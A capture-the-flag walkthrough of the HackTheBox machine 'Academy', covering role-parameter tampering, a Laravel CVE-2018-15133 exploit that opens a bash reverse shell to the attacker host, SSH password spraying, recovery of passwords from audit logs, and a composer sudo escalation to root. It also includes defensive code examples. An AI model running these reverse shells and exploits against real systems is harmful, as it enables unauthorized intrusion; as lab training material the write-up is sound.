Academy

Hi all, the primary purpose of this write-up is to practice scripting skills where possible and to be less reliant on pre-built tools.

Port scanning

IP

10.10.10.215

We will start by enumerating the ports on the target machine. To do so, we can write a Python script that scans a range of ports and performs banner grabbing to identify the services running.

We can run the script as follows:

python3 Portscanner.py 10.10.10.215 1-1000
  • This script checks ports given in a range

  • Performs banner grabbing to identify services running on the machine

From what we can tell, we have:

  • SSH

  • a web server running (Apache/2.4.41)

    • most likely an Ubuntu server

    • we can add the hostname "academy.htb" to our hosts file

sudo vi /etc/hosts

To write and quit in the Vim editor:

esc
:wq

Now we can navigate to the web server

Web Server (Apache)

First, we are greeted with a web page with two options.

We can check the technologies the web page is using with Wappalyzer; you can install it from https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/

From Wappalyzer we can confirm the web page uses PHP and that it is indeed an Ubuntu server.

With this information we can do some directory busting to find any hidden directories. For this we are going to use Feroxbuster; to install it, first install Rust on our system:

curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
source $HOME/.cargo/env
cargo install feroxbuster

To find hidden directories we can run the following command:

feroxbuster -u http://academy.htb -t 5 -L 5 -n -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php
  • we are using SecLists to provide our wordlist

  • we want to add the PHP extension since we know the web page uses PHP

We found one interesting directory:

  • admin.php

Within login.php, common credentials are not successful:

Admin:Admin
admin:password
admin:Password123!

Within register.php, let's register an account and see what access we have.

Logging in with the user we just created, we are greeted with a static page with little to no functionality.

Let's catch the web request and see what is being sent to the server when we register an account. Instead of using Burp or ZAP, we are going to catch the request using a tool called mitmproxy, whose Python API lets us script the modification of the request.

For our proxy we need to set up a few things.

We want to install the FoxyProxy plugin for our browser: https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/

Once installed in our browser, we need to configure the plugin to redirect traffic through our proxy.

Within FoxyProxy click Options -> Add

Follow the configuration.

We need to install the mitmproxy certificate. In the terminal, run mitmproxy:

mitmproxy

In our browser, activate the mitm configuration in FoxyProxy, then head to http://mitm.it/ and download the certificate for your system; for us we want the Linux option.

Within your browser settings search for certificates → Certificate Manager → Import → in your Downloads directory click on the certificate from mitm → tick the box "Trust this CA to identify websites".

Now we can activate mitmproxy:

mitmproxy --mode regular@8081

Let's register another user.

Within the terminal, we will see a POST request to /register.php.

We can click on the request to see the parameters being sent to the server.

Of real interest is the "roleid" parameter, which is equal to 0. What if we register another account and set "roleid" equal to 1?

For this, we can write a Python script (an mitmproxy addon) to automate catching the request and modifying the parameter using mitmproxy's API:

mitmproxy -s role_id_changer --mode regular@8081

Now let's register a new user.

If we look at the recent POST request in our terminal, we can see the changes made.

We have successfully changed roleid from 0 to 1.

Let's try our new user's credentials on the admin.php page.

We can successfully log in and are greeted with what looks like a planner.
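As an added example (not code from the write-up, and not the Academy application's own code), here is the server-side counterpart of what the proxied request just exploited: a registration handler that copies every submitted parameter, including roleid, beside one that allow-lists the fields it accepts, assigns the role itself, and logs any unexpected parameter as a tamper signal. Only "roleid" and its 0/1 values come from the captured request; the field names uid and password, the hashing helper and the constructed request are assumptions.

```python
"""Mass assignment on registration: vulnerable handler beside a hardened one.

Added illustration, not the Academy application's code.  Field names other
than "roleid" (uid, password) are assumptions about the form.
"""
import hashlib
import logging
import os
from dataclasses import dataclass

log = logging.getLogger("register")

ROLE_USER = 0   # value the legitimate form sends
ROLE_ADMIN = 1  # value injected through the proxy in the write-up

# Fields the registration form is allowed to set.  Anything else the client
# sends (roleid in particular) is ignored and logged.
ALLOWED_FIELDS = frozenset({"uid", "password"})


@dataclass
class Account:
    username: str
    password_hash: str
    roleid: int


def hash_password(password: str) -> str:
    """Salted PBKDF2 (standard library only); stored as salt$hash in hex."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return f"{salt.hex()}${digest.hex()}"


def register_vulnerable(form: dict) -> Account:
    """Trusts every submitted field, including roleid.

    This mirrors the behaviour observed in the write-up: whatever roleid the
    client sends (0 from the real form, 1 from the proxied request) is stored.
    """
    return Account(
        username=form["uid"],
        password_hash=hash_password(form["password"]),
        roleid=int(form.get("roleid", ROLE_USER)),
    )


def unexpected_fields(form: dict) -> set[str]:
    """Fields the client sent that the form never defines (a tamper signal)."""
    return set(form) - ALLOWED_FIELDS


def register_hardened(form: dict) -> Account:
    """Binds only allow-listed fields and assigns the role server-side."""
    extra = unexpected_fields(form)
    if extra:
        # Detection hook: a browser submitting the real form never sends these.
        log.warning("registration for %r carried unexpected fields %s",
                    form.get("uid"), sorted(extra))
    return Account(
        username=form["uid"],
        password_hash=hash_password(form["password"]),
        roleid=ROLE_USER,   # never derived from client input
    )


if __name__ == "__main__":
    # Constructed request, shaped like the proxied one in the write-up.
    tampered = {"uid": "eve", "password": "pw", "roleid": "1"}
    print("vulnerable ->", register_vulnerable(tampered).roleid)  # 1: admin
    print("hardened   ->", register_hardened(tampered).roleid)    # 0: user
```

The hardened version is also where detection lives: a normal browser submission of the form never carries roleid, so any request that does is worth logging and reviewing, independently of whether the value was honoured.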

Already we have some juicy details: it looks like we have some usernames and a subdomain.

users

cry0l1t3
mrb3n

subdomain

dev-staging-01.academy.htb
  • let's add the subdomain to our /etc/hosts

Navigate to http://dev-staging-01.academy.htb/

  • it looks to be an open-source web application framework called Laravel

  • from the page, we can see a lot of information being exposed

From a quick Google search, we have a good hunch that this Laravel instance is vulnerable to CVE-2018-15133.

We can use the following exploit; clone the repo into our working directory:

sudo git clone https://github.com/aljavier/exploit_laravel_cve-2018-15133.git

cd into the repo and install requirements.txt:

pip3 install -r requirements.txt

For the exploit to work, we need the API_KEY, which we found within the Laravel app.

In preparation for our reverse shell, let's set up a netcat listener:

nc -lvnp 9001

Now for the exploit; we will use a one-liner bash TCP reverse shell:

python3 pwn_laravel.py -c "bash -c 'bash -i >&/dev/tcp/10.10.16.4/9001 0>&1'" http://dev-staging-01.academy.htb dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
  • we have specified the command we want to run on the system (the bash reverse shell), the URL, and the API key

We should have a hit on our netcat listener.

Privilege Escalation

In our new shell, we are a low-privileged user.

Our next move is to find a way to elevate our privileges, searching progressively through the system. If we look at the /var/www/html/academy/ directory we will find a hidden file, .env:

ls -al /var/www/html/academy
  • the .env file can contain sensitive material, and in our case it does:

mySup3rP4s5w0rd!!

We found a unique password. Next, let's search the /etc/passwd file to find the users on the system:

cat /etc/passwd

From what we can see we have multiple users:

21y4d
ch4p
cry0l1t3
egre55
g0blin
mrb3n

Now that we have a list of users and a password, let's script an SSH password sprayer.

We'll create a file containing our user list and a file containing our password list; once that is done we can run our script as follows:

python3 ssh_pass_sprayer.py 10.10.10.215 user.txt passlist.txt

We get a hit for a valid set of credentials:

cry0l1t3: mySup3rP4s5w0rd!!

We can SSH in as cry0l1t3:

ssh cry0l1t3@10.10.10.215

Privilege Escalation as cry0l1t3

From here, user.txt is within the /home/cry0l1t3 directory.

Let's upgrade our shell:

python3 -c "import pty;pty.spawn('/bin/bash')"

When we look at the id of our user, we can see it is part of the "adm" group. Members of "adm" usually have permission to read the log files inside /var/log.

Let's focus on the /var/log/audit logs. For this we can create a simple bash script to search for the keywords comm="su" and comm="sudo".

We need to create this script on our local machine and then transfer it over to the target. Once our script is ready to go, we need to set up a Python HTTP server so we can grab it from our shell.

On the local machine, start a Python server:

python3 -m http.server 8888

From our target machine, we cd into the /tmp directory and use wget to retrieve the script:

cd /tmp && wget http://10.10.16.4:8888/grepper.sh

We need to give it execute permissions:

chmod +x grepper.sh

Now we just need to run it:

./grepper.sh

We do find something interesting in the results:

  • what we have highlighted is a log entry; the fields we are most interested in are:

  • comm="su": This indicates the command that triggered the event. In this example, the su command was executed.

  • data=6D7262336E5F41634064336D79210A: This part contains additional data associated with the event, typically in hexadecimal format. The meaning of this data can vary depending on the specific event.

Let's convert this hex value to ASCII using a Python script.

We have a possible password:

mrb3n_Ac@d3my!
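To show what the grep-and-decode step is actually reading, here is an added Python example (not the write-up's grepper.sh or its conversion script) that parses auditd TTY records, keeps those for su and sudo, and decodes the hex data field. The record layout follows the comm="…" and data= fields quoted above; the sample log lines are constructed, except that the su record's data value is the one found on the box.

```python
"""Parse auditd TTY records and decode the hex-encoded data field.

Added illustration of the grep-and-decode step in the write-up; not the
write-up's grepper.sh.  The record layout follows the comm="..." data=<hex>
fields quoted above.  The sample lines are constructed, except that the
second record's data value is the one shown in the write-up.
"""
import re

# Constructed sample of /var/log/audit/audit.log content.
SAMPLE_AUDIT_LOG = """\
type=TTY msg=audit(1605000001.123:101): tty pid=2500 uid=1002 auid=1002 ses=3 major=136 minor=1 comm="bash" data=6C73202D616C0A
type=TTY msg=audit(1605000007.456:102): tty pid=2510 uid=1002 auid=1002 ses=3 major=136 minor=1 comm="su" data=6D7262336E5F41634064336D79210A
type=USER_START msg=audit(1605000007.789:103): pid=2510 uid=1002 auid=1002 ses=3 msg='op=PAM:session_open exe="/usr/bin/su" res=success'
"""

# Only TTY records carry keystroke data; other record types are skipped.
TTY_RECORD = re.compile(
    r'^type=TTY msg=audit\((?P<ts>[0-9.]+):(?P<serial>\d+)\):.*?'
    r'\bcomm="(?P<comm>[^"]*)"\s+data=(?P<data>[0-9A-Fa-f]*)'
)


def decode_tty_data(hex_data: str) -> str:
    """Hex keystroke bytes -> text; undecodable bytes are shown as U+FFFD."""
    if len(hex_data) % 2:
        raise ValueError("odd-length hex in data field")
    return bytes.fromhex(hex_data).decode("utf-8", errors="replace")


def parse_tty_records(log_text: str) -> list[dict]:
    """One dict per TTY record: timestamp, serial, comm and decoded keystrokes."""
    records = []
    for line in log_text.splitlines():
        m = TTY_RECORD.match(line)
        if not m:
            continue   # not a TTY keystroke record
        records.append({
            "timestamp": float(m["ts"]),
            "serial": int(m["serial"]),
            "comm": m["comm"],
            "keystrokes": decode_tty_data(m["data"]),
        })
    return records


def keystrokes_for(log_text: str, commands=("su", "sudo")) -> list[tuple[str, str]]:
    """(comm, decoded keystrokes) for records whose comm is in `commands`.

    This is the same filter as the write-up's grep for comm="su"/comm="sudo",
    with the hex decode folded in.
    """
    return [(r["comm"], r["keystrokes"])
            for r in parse_tty_records(log_text) if r["comm"] in commands]


if __name__ == "__main__":
    for comm, text in keystrokes_for(SAMPLE_AUDIT_LOG):
        print(f"comm={comm!r} typed={text!r}")
```

From the defender's side, this is the review a log analyst should run before anyone else does: TTY auditing records keystrokes, including what is typed at an su or sudo prompt when pam_tty_audit is configured with its log_passwd option, and here the resulting file was readable by the adm group. Keeping /var/log/audit readable by root only and leaving log_passwd off removes both halves of the exposure.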

Let's change our user to mrb3n:

su mrb3n

We are now user mrb3n.

Privilege Escalation via mrb3n

Let's fix our shell:

python3 -c "import pty;pty.spawn('/bin/bash')"

Let's check our current sudo privileges:

sudo -l

It looks like we can use the composer command with sudo privileges; if we look at https://gtfobins.github.io/gtfobins/composer/#sudo we can see how to escalate our privileges to root:

TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
sudo composer --working-dir=$TF run-script x

We are now root.
